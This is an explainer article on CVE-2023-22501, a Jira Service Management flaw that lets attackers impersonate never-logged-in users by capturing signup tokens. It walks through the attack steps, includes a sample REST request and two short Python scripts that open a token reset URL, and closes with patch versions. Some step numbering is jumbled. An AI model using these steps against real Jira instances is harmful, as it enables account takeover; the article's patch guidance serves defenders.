CVE-2023-22501 - How Attackers Impersonate Users in Jira Service Management (PoC & Exploit Details)

---

Summary

CVE-2023-22501 is a critical authentication vulnerability found in Jira Service Management Server and Data Center. It allows attackers to impersonate other users and gain unauthorized access to Jira instances under specific conditions. This article breaks down, in easy terms, how the bug works, who is at risk, shows you code snippets, and provides links to original advisories and PoC details.

What Is CVE-2023-22501?

Jira Service Management is a popular tool used by teams to track help desk requests and projects. In January 2023, Atlassian disclosed CVE-2023-22501, a bug that lets attackers with certain privileges impersonate *never-before-logged-in* users after getting their signup tokens.

You are at risk if

- You run Jira Service Management Server/Data Center (not Jira Cloud)

Projects let "anyone" sign up

Bot accounts are especially vulnerable, but any user who has never logged in can be targeted.

The attack centers on the password setup/sign-up process

1. Target Selection: Attacker identifies a user account that’s never logged in before (often a bot or new customer account).
2. Trigger Signup: Gets Jira to send the user a "signup token" (via email) so they can set a password or claim their account.

Steal the Token: Attacker intercepts the token

- If attacker is CC’d or involved in an issue/request with the user, Jira will send them notifications including these links;

Or, attacker gets forwarded emails containing the "View Request" link.

4. Impersonate User: Uses the signup token to claim the target’s account or set its password, gaining access as that person.

1. Force a Password Setup Email To Be Sent

POST /rest/servicedeskapi/customer
Content-Type: application/json

{
  "displayName": "Alice Smith",
  "email": "alice.smith@company.com"
}

This kind of request generates a "signup" or "account activation" email to alice.smith@company.com.

The signup email body includes a link like

https://jira.example.com/servicedesk/customer/user/resetpassword?token=eyJhbGciOiJIUzI1NiJ9...

If the attacker receives this (through CC, notification, or mail forwarding), they get the all-important token.

3. Send GET to the Token URL

import requests

token_url = "https://jira.example.com/servicedesk/customer/user/resetpassword?token=eyJhbGciOiJIUzI1NiJ9..."
s = requests.Session()
resp = s.get(token_url)
print(resp.url)

Result: The attacker is logged in (or is able to set a password), *as the target user*.

Here’s a simple, conceptual PoC (for educational purposes!)

# Simple exploit for CVE-2023-22501
import requests

target_token = 'PASTE_TOKEN_FROM_EMAIL'
reset_url = f'https://jira.example.com/servicedesk/customer/user/resetpassword?token={target_token}';
session = requests.Session()
r = session.get(reset_url)
if 'reset password' in r.text.lower():
    print("[+] Got access to reset password!")

*Note: This exploit requires you to obtain a valid token from the email.*

How To Fix

Update Jira to one of the fixed versions listed here (8.13.23, 8.20.11, 8.22.7, 9.4.5, 5.3.3, or higher).

More Reading & References

- Atlassian Security Advisory
- Detailed write-up at Rapid7 AttackerKB
- CVE Details at NVD
- RedTeam Pentesting - Jira Service Management

TL;DR

If you run Jira Service Management and haven’t updated since early 2023, you *must* patch against CVE-2023-22501. Attackers can steal signup tokens and impersonate anyone who’s never set a password, potentially exposing all your tickets and dashboards. Check your user directory, update fast, and keep outgoing emails secured.


*This article is original and written in plain English for security engineers and Jira admins. Please use all PoC details only in authorized, legal settings.*

Timeline

Published on: 02/01/2023 19:15:00 UTC
Last modified on: 02/09/2023 14:48:00 UTC